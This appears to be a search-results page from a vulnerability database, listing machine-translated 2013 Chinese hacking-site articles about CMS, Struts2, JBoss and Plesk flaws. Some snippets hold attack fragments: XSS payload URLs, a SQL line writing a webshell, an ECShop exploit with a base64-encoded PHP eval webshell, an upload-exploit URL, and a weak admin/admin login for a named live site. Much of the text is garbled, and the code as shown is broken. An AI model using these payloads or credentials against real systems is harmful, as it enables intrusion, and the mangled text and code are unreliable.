Lucene search

7620 matches found

myhack58
added 2013/07/19 12:00 a.m., 25 views

struts2 latest vulnerability S2-016, S2-017 patch programme-vulnerability warning-the black bar safety net

Yesterday struts2 blast a good deal of vulnerability, with know Brother words to say is:“this afternoon the whole Chinese hacking ring like mad started to use this exploit black site, everyone can feel it.” See under the clouds the two days of data: ! Related reports: The disaster: the Chinese...

AI score: 7.2
Exploits: 0

myhack58
added 2013/07/18 12:00 a.m., 28 views

Use Sqlmap to test MetInfo enterprise website management system MySql injection vulnerability-vulnerability warning-the black bar safety net

The last fork fork tell Sqlmap simple injection access database tutorial, this time we talk about the MySql database MetInfo is a powerful enterprise web site management system, using PHP+Mysql architecture. Fork fork download The is MetInfo 5.1.5 the free version, let's not pick, not analysis of...

AI score: 7.3
Exploits: 0

myhack58
added 2013/07/18 12:00 a.m., 17 views

Struts2 then blast remote code execution vulnerability S2-016-a vulnerability warning-the black bar safety net

Struts and blast remote code execution vulnerability! In this vulnerability, the attacker can manipulate the parameters of the remote execution of malicious code. The Struts 2.3.15.1 the previous version, the parameters of the action the value of the redirect and redirectAction is not properly...

AI score: 1
Exploits: 0

myhack58
added 2013/07/18 12:00 a.m., 17 views

Struts2 latest remote code execution vulnerability S2-016 official patch analysis-vulnerability warning-the black bar safety net

Contrast a bit struts svn, in fact, only modified one file ! For the action of the prefix, an increase cleanactionname function, filtering the ognl implementation, For the redirect and redirectaction prefix, the direct removal. !...

AI score: 3.2
Exploits: 0

myhack58
added 2013/07/18 12:00 a.m., 13 views

Simplog multiple pieces of vulnerability analysis-vulnerability warning-the black bar safety net

Late night bored go find some CMS for mining vulnerability, listening to friends say simplog there are many vulnerabilities, that I also the next to see his program exactly how unsafe. Due to time problems yourself from the code analysis, and test that part of it is not written!!! Coming to the...

AI score: 0.4
Exploits: 0

myhack58
added 2013/07/16 12:00 a.m., 40 views

File vulnerability analysis in the locate the file field method-vulnerability warning-the black bar safety net

Today looking at the snow on the to see someone ask how to control the file format documentation, and debugging the analysis program being parsed is what structure? Here summarizes a few methods, welcome to Supplement, but sometimes still need to rely on experience. a taint tracking analysis: the...

AI score: 0.6
Exploits: 0

myhack58
added 2013/07/15 12:00 a.m., 17 views

(CVE-2012-1875) Using Metasploit to test the latest of the IE8 vulnerability-vulnerability warning-the black bar safety net

Originally wanted to use the Metasploit Console to test, but the console how also could not find this exploit, temporarily don't know the reason, and later use msfgui to test. 1, rb the File Download address:...

AI score: 7
Exploits: 0

myhack58
added 2013/07/14 12:00 a.m., 43 views

Web application security vulnerability analysis and prevention (ASP article)-the vulnerability warning-the black bar safety net

In previous articles we have for common Web security vulnerabilities and prevention methods are analyzed and described, and learn to Web security vulnerability of the website's security operations as well as corporate sensitive information anti-leakage effect is huge, so effective against Web...

AI score: 7.3
Exploits: 0

myhack58
added 2013/07/14 12:00 a.m., 14 views

Web application security vulnerability analysis and prevention (PHP article)-the vulnerability warning-the black bar safety net

PHP is the current Internet environment in the most mainstream of dynamic website development script language, using PHP development of Web application security is also a hacker like the focus of attention. This article will by source code analysis a way to use PHP to write Web application securi...

AI score: 7.5
Exploits: 0

myhack58
added 2013/07/11 12:00 a.m., 59 views

DEDECMS v5.7 (2013-06-07) xss+csrf 0day-vulnerability warning-the black bar safety net

Bookmark management existxss+csrf http://localhost/dedecms/member/flinkmain.php xss:http://localhost/dedecms/member/flinkmain.php?dopost=addnew&title=test' onmouseover=alert1;'&url=test' onmouseover=alert1;' CSRF:img...

AI score: 0.2
Exploits: 0

myhack58
added 2013/07/07 12:00 a.m., 16 views

Cherry enterprise website management system V3.1 vulnerability-the vulnerability warning-the black bar safety net

Vulnerability file: newscategory. asp Set rs = server. CreateObject"adodb. recordset" sql ="select from news where category="&request. QueryString"id"&" order by id desc" rs. Open sql, conn, 1, 1 If rs. EOF Then Vulnerability code: not filtered Vulnerability file admindelete. asp Vulnerability...

AI score: 0.1
Exploits: 0

myhack58
added 2013/07/07 12:00 a.m., 24 views

Qi Bo cms back-end database tool at the filter is not strictly the actuator can be written in a word-vulnerability and early warning-the black bar safety net

If your account password is leaked then you're in danger. in the background can directly get a webshell The background for the convenience of webmasters to have a database tool where the implementation Select '%execute request"value"%' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp'; Just write t...

AI score: 3.3
Exploits: 0

myhack58
added 2013/07/06 12:00 a.m., 11 views

Cherry enterprise cms V3.1 SQL injection and arbitrary administrator account password change. Delete-bug warning-the black bar safety net

Cherry enterprise website management system V3.1 SQL injection and any administrator account password to modify. Delete vulnerability Program download address: http://down.chinaz.com/soft/31227.htm Vulnerability file: newscategory. asp Set rs = server. CreateObject"adodb. recordset" sql ="select...

AI score: 1.1
Exploits: 0

myhack58
added 2013/07/03 12:00 a.m., 9 views

metinfo(m topology)of the enterprise website management system SQL injection vulnerability-vulnerability warning-the black bar safety net

The vulnerability occurs in the member/getpassword. php with admin/admin/getpassword. php file if$p $array = explode'.', base64decode$p; $sql="SELECT FROM $metadmintable WHERE adminid='".$ array0."'"; $sqlarray = $db-getone$sql; base64decode$pafter the value with explode split and then submitted ...

AI score: 8.1
Exploits: 0

myhack58
added 2013/07/03 12:00 a.m., 20 views

mlecms multi-language enterprise website management system v2.3 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

Vulnerability defects: the storage type xss Vulnerability file: links.php Loopholes in the application link at the website name and logo at the address, because the site name “webname” is post GET and didn't do the filter so xss appeared! Using description: xss hit the backend to get webshell Background get a shell...

AI score: 0.1
Exploits: 0

myhack58
added 2013/07/02 12:00 a.m., 17 views

La Cala is another sub-Station command execution vulnerabilities included cross-site threat-vulnerability warning-the black bar safety net

Brief description: Test La Cala a sub-Station, and found the pull Station using THINKPHP open source framework, there is still some risk. Does not affect the customer data, the hazard rating. Detailed description: 1 Nginx service end is not a reasonable configuration to cause arbitrary PHP script...

AI score: 0.7
Exploits: 0

myhack58
added 2013/07/02 12:00 a.m., 14 views

The word Chrome word plugin xss vulnerability-vulnerability warning-the black bar safety net

Brief description: Youdao dictionary zoned word translation chrome plug-in, select the special structure of the text, for word translation, and executes the associated code. Detailed description: Maybe you just want to copy the above code,and select them, does not want zoned word translation Youd...

AI score: 0.6
Exploits: 0

myhack58
added 2013/07/02 12:00 a.m., 11 views

139 mailbox of the user experience center of the back of the weak password vulnerability warning-the black bar safety net

Brief description: Administrator password security awareness is weak, password is too simple. Detailed description: The background of the page easily obtained. http://uec.mail.10086.cn/admin/login.jsp User password: admin directly to the background, Vulnerability proof: ! !...

AI score: 0.3
Exploits: 0

myhack58
added 2013/07/02 12:00 a.m., 33 views

Taobao fraud and a module XSS vulnerabilities can steal user cookies-vulnerability warning-the black bar safety net

First let's look at Taobao XSS vulnerability ! Taobao decoration can invoke a third-party module, this means that this third party template if there is a vulnerability even being invaded are likely implicated in Taobao shop! Edit the third party Module, added to XSS code, and then the shop calls ! Op...

AI score: 7.2
Exploits: 0

myhack58
added 2013/06/30 12:00 a.m., 13 views

bluecms the latest version of the double-byte universal password into the background-bug warning-the black bar safety net

Brief description: bluecms the latest version i.e., v1.6sp1, processing of login authentication when the variables are single quotes escaped, but can be used gbk double-byte coding the closing single quote and then comment to enter the background Detailed description: bluecms verify the login cod...

AI score: 2.6
Exploits: 0

myhack58
added 2013/06/30 12:00 a.m., 13 views

Rain Nan travel network service management system v2013.6.11 The newest vulnerabilities 0day-vulnerability warning-the black bar safety net

Vulnerability-1 Vulnerability type: the storage type xss Code file: LstBook. Asp Detail code: ------------------------------------------------ If action="addbook" Then If TrimRequest"xm"="" Then Call alert"name cannot be empty","-1" End If If TrimRequest"sj"="" Then Call alert"phone can not be...

AI score: 0.2
Exploits: 0

myhack58
added 2013/06/30 12:00 a.m., 34 views

metinfo enterprise website management system SQL injection vulnerability-vulnerability warning-the black bar safety net

Brief description: metinfo enterprise website management system SQL injection vulnerability Detailed description: member/getpassword. php with admin/admin/getpassword. php file if$p $array = explode'.', base64decode$p; $sql="SELECT FROM $metadmintable WHERE adminid='".$ array0."'"; $sqlarray =...

AI score: 8.2
Exploits: 0

myhack58
added 2013/06/29 12:00 a.m., 12 views

39 Health a sub-Station SQL injection-vulnerability warning-the black bar safety net

Detailed description: http://nutrition.39.net/index.aspx?id=996 Vulnerability to prove: !...

AI score: 0.3
Exploits: 0

myhack58
added 2013/06/29 12:00 a.m., 27 views

Ali cloud according to the amount of payment logic vulnerabilities a gold(cheap enjoy Super host-vulnerability warning-the black bar safety net

To Description: Ali cloud cloud host purchase logic design is not tight, after a base64 encoding of the data can be tampered with, and the rear end will accept the tampering of the data, and can forge a super host. The need to spend 2 0 1 5 $ 8/month host only need 9 3 6 Yuan/month(see Figure) ! ...

AI score: 0.7
Exploits: 0

myhack58
added 2013/06/29 12:00 a.m., 18 views

53KF dns zone transfer vulnerability-vulnerability warning-the black bar safety net

Detailed description: 53KF business online platform dns-domain transfer vulnerability Vulnerability proof: root@kali: dnsenum 53kf.com ! !...

AI score: 1.8
Exploits: 0

myhack58
added 2013/06/29 12:00 a.m., 19 views

360 Forum stored xss can be introduced into the virus hung it-vulnerability warning-the black bar safety net

1 vulnerability location: 360 Forum any plate, post, reply in the rich text editor. 2 Use code:! 3 vulnerability hazards: pass to kill 360 all Forum sections. Due to China's current IE6 users is fairly large, the most recent statistics for the 21.3 per cent. So the harm is pretty large, so...

AI score: 0.3
Exploits: 0

myhack58
added 2013/06/27 12:00 a.m., 13 views

Network fun online shopping system flagship version v6.7 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

I haven't play the audit, so download the source code find a xss to play....!!! Vulnerability type: persistent xss Registry there are stored xss Specific code: rs"username"=trimrequest"username" rs"userpassword"=md5trimrequest"userpassword" rs"useremail"=trimrequest"useremail"...

AI score: 1.4
Exploits: 0

myhack58
added 2013/06/27 12:00 a.m., 19 views

Loser talking about the router vulnerability the Mining(Science English-a vulnerability warning-the black bar safety net

Router vulnerability mining exploration and Science Editor: the dusk url: www.arc5ch.com Without copyright no jj Want to in the country looking for some route of penetration of the documentary, but still wood what the result is tonight to a domestic routing manufacturers to submit some of the...

AI score: 7.3
Exploits: 0

myhack58
added 2013/06/25 12:00 a.m., 16 views

DLL hijacking vulnerability analysis-vulnerability warning-the black bar safety net

Hack in the hands of the new weapons Eric 2012 early release of China 2011 in the second half of the personal Internet Security report, containing such a data: 2011 in the second half of ten hot points of the Trojans, where 5 is the use of DLL hijacking vulnerability to system damage. DL...

AI score: 7.3
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 29 views

nginx url decoded trigger the waf vulnerability-vulnerability warning-the black bar safety net

Last year found the ngx a bug, and until recently air only wrote this post. Nginx ngxunescapeuri function in the processing of url decode when not follow the standard url decode, causing a range use this function to decode the waf There are bypass vulnerability The problem occurs in the function ...

AI score: 1.2
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 45 views

The United States VPS management system SolusVM 1.13.03 SQL injection vulnerability with exp-a vulnerability warning-the black bar safety net

SolusVM software is a powerful graphical user interface for VPS management system that can simultaneously manage three kinds of Virtualization Technology: OpenVZ ,Xen Paravirtualization and Xen HVM in. The use of this software open us VPS customer, will feel he is very safe and convenient. Poor...

AI score: 1.2
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 12 views

Easy to buy program SQL injection vulnerability-vulnerability warning-the black bar safety net

Easy to buy management system is a positioning high-end market group buying content management system,to the lowest cost,minimal human input in the shortest time to set up a fully functional, excellent performance, huge size and easy to maintain website platform. Not filtered lead injection ! ! T...

AI score: 7.1
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 34 views

easethink payment. php injection vulnerability analysis attached to the use of the EXP-bug warning-the black bar safety net

Vulnerability author: leehenwu 0 1 vulnerability analysis Vulnerabilities in payment. php file elseif$REQUEST'act'=='return' //payment jump back to page $classname = $REQUEST'classname'; $paymentinfo = $GLOBALS'db'-getRowCached"select from ". DBPREFIX."payment where classname = '".$ classname."'"...

AI score: 2.1
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 13 views

6 on a neglected Microsoft vulnerability MS13-051--Note the large cattle of the analysis process-exploit warning-the black bar safety net

Foreign media once again bashing Microsoft patch rating, only as advice, not as a Bible. Last week Microsoft released 6 month patch, wherein MS13-051 rating is important, on the grounds that the vulnerability requires user interaction, and is currently found to be utilized in the attack is on...

AI score: 0.9
Exploits: 0

myhack58
added 2013/06/21 12:00 a.m., 33 views

Android ICS adb debugging tools System Restore directory traversal vulnerability, can provide right-vulnerability warning-the black bar safety net

The original vulnerability information comes from [email protected] Vulnerability description: adb Android Debug Bridge backup/restore option allows you to backup and restore applications, including system applications. Backup files to tar. the zlib PACKAGE, files the default suffix is . ab. When a backup contains a file, the file...

Exploits: 0

myhack58
added 2013/06/19 12:00 a.m., 50 views

ECShop v2.7.3 RELEASE 20121106 EXP-vulnerability warning-the black bar safety net

-- coding:gbk - import httplib2 from urllib import urlencode def PostDataurl: url=url+'/admin/template. php? act=updatelibrary' Defined to submit the data html='if fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2Z1Y2tdktsgpz5mdwnr1 6 0 8 6/if'...

AI score: 0.2
Exploits: 0

myhack58
added 2013/06/14 12:00 a.m., 31 views

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

AI score: 0.2
Exploits: 0

myhack58
added 2013/06/13 12:00 a.m., 16 views

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

AI score: 0.9
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 12 views

PHPCMS V9 arbitrary file include vulnerability-vulnerability warning-the black bar safety net

Brief description: Somewhere considered not rigorous, it is possible to cause the file containing the vulnerability. Use Conditions: registerglobal=ON Detailed description: Vulnerability file:/plugin.php Vulnerability code: 22 row Trigger conditions: registerglobal=ON Code fragment: 15 to 22...

AI score: 0.8
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 7 views

New network vulnerabilities of the VPS automated production systems many VPS password leak-vulnerability warning-the black bar safety net

The new network of the VPS automated production system column of the directory can view the system log file From the log file to find the background of the account after the burp blasting is actually a weak password The background relates to the user of the vps password log leaked url:...

AI score: 0.2
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 12 views

SiteServer cms Cookie spoofing vulnerability-vulnerability warning-the black bar safety net

Brief description: . net platform SiteServer cms he the powerful is unquestionable, but the problem is also many, The discovery of the cookies tricking a gold after testing, 3.44 above version of the pass to kill Detailed description: ! Local set up an environment and then log in to grab the...

AI score: 1.3
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 18 views

Youku open platform storage type XSS script attack vulnerability success hijacking the background-bug warning-the black bar safety net

Youku open platform in the“Create an application”feature of the plurality of fields, not from the client to submit the variables into the database, the output of the safety of the escape process. http://open.youku.com/app/create ! Lead can be directly stepped into the background. Vulnerability...

AI score: 7.3
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 18 views

Easy to shoot global the WEB-INF directory unauthorized access to sensitive information disclosure-vulnerability warning-the black bar safety net

The WEB-INF directory unauthorized access to the web. xml disclosure of sensitive information Detailed description: Original link http://www. epailive. com/bottomActionbottominclude. do? fileName=about. jsp fileName=not a special character, the WEB-INF directory to do the filtering Test Link...

AI score: 0.9
Exploits: 0

myhack58
added 2013/06/12 12:00 a.m., 10 views

China digital IDC Management Platform is not weighted limit authentication-vulnerability warning-the black bar safety net

China digital IDC management platform to address leaks lead to a lot of ip leakage Looks like CE Dongli, new network are China digital's Detailed description: http://119.10.114.29/index1.php http://123.100.0.42/ !...

AI score: 7.2
Exploits: 0

myhack58
added 2013/06/10 12:00 a.m., 22 views

Jboss Application Server remote code execution vulnerability 0day-vulnerability warning-the black bar safety net

Jboss Application Server remote code execution vulnerability 0day Tags: vulnerability 0day JBoss AS Remote Exploit by Kingcope use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage print “JBoss AS Remote Exploit by Kingcope usage: perl jboss.pl “;print “example: perl...

AI score: 1.6
Exploits: 0

myhack58
added 2013/06/10 12:00 a.m., 18 views

EmpireCMS 6.0 management rights GETSHELL-a vulnerability warning-the black bar safety net

Analysis process : eclassfunctions.php 2609 row ReUserjs function. function ReUserjs$jsr,$addpath global $empire,$publicr; DoFileMkDir$addpath.$ jsr 'jsfilename';//build directory //Obtain the js template $jstemptext=GetTheJstemp$jsr jstempid; //remove the set Js array...

AI score: 0.4
Exploits: 0

myhack58
added 2013/06/10 12:00 a.m., 13 views

ECShop shop system the latest versions contain vulnerabilities-vulnerability warning-the black bar safety net

This hole, actually I on 2012 year 1 month of time to see ecshop on the analysis, originally due to feeling tasteless you didn't put out. Just under the official website latest version, didn't think also exist. Vulnerability file:/demo/index.php | 1 | if ! empty$POST'lang' //if not empty ---|-...

AI score: 1
Exploits: 0

myhack58
added 2013/06/10 12:00 a.m., 10 views

Wind news. net version arbitrary code execution(the official has demo)-vulnerability warning-the black bar safety net

Registered users, published articles, capture modification of the package, killed First look at the uploads directory has no execute permissions, and found no, it seems to be in the bag. ! 1 ! 2 ! 3 ! 4...

AI score: 4.3
Exploits: 0

myhack58
added 2013/06/07 12:00 a.m., 12 views

Kerry friends of Science and technology cms upload vulnerability and fix-vulnerability warning-the black bar safety net

The program uses the upload page uploadfile. asp not be verified, leading to the establishment of malformations directory upload image the Trojans get a shell vulnerability. exp: the http://www.8090sec.com/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1. mad. asp His original Upload...

AI score: 7
Exploits: 0

myhack58
added 2013/06/07 12:00 a.m., 30 views

Plesk hosting management software remote get shell 0day-vulnerability warning-the black bar safety net

6 month 5 days late, the Great God king cope in foreign countries well-known mailing list seclists burst Plesk latest remote exploit 0day and gives a perl version of the exp. On Plesk with: Plesk is a cross-platform host Management Control Panel software, is a server virtualization and automation...

AI score: 1.6
Exploits: 0

Total number of security vulnerabilities: 7620